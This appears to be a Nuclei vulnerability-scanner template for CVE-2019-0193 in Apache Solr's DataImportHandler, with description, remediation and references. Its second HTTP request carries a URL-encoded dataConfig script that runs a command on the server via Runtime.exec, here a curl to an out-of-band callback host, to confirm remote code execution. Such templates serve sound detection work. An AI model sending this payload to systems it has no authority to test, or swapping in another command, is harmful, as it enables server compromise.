id: CVE-2019-0193 info: name: Apache Solr DataImportHandler <8.2.0 - Remote Code Execution author: pdteam severity: high description: | Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. remediation: | Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. reference: - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ - https://issues.apache.org/jira/browse/SOLR-13669 - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-0193 cwe-id: CWE-94 epss-score: 0.94457 epss-percentile: 0.99013 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: solr tags: cve2019,apache,rce,solr,oast,kev,vulhub,cve http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close - | POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1 Host: {{Hostname}} Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl" extractors: - type: regex name: core group: 1 regex: - '"name"\:"(.*?)"' internal: true # digest: 4a0a00473045022061da5475d2f7feee10ca43b37616f01f3e05c71481a7e11b3e632fde4bc7f54d022100fca057727d4ee4b0ce4b0cfa1d4fa081bcfcf9358721fdacbb33d55ba6bb049f:922c64590222798bb761d5b6d8e72950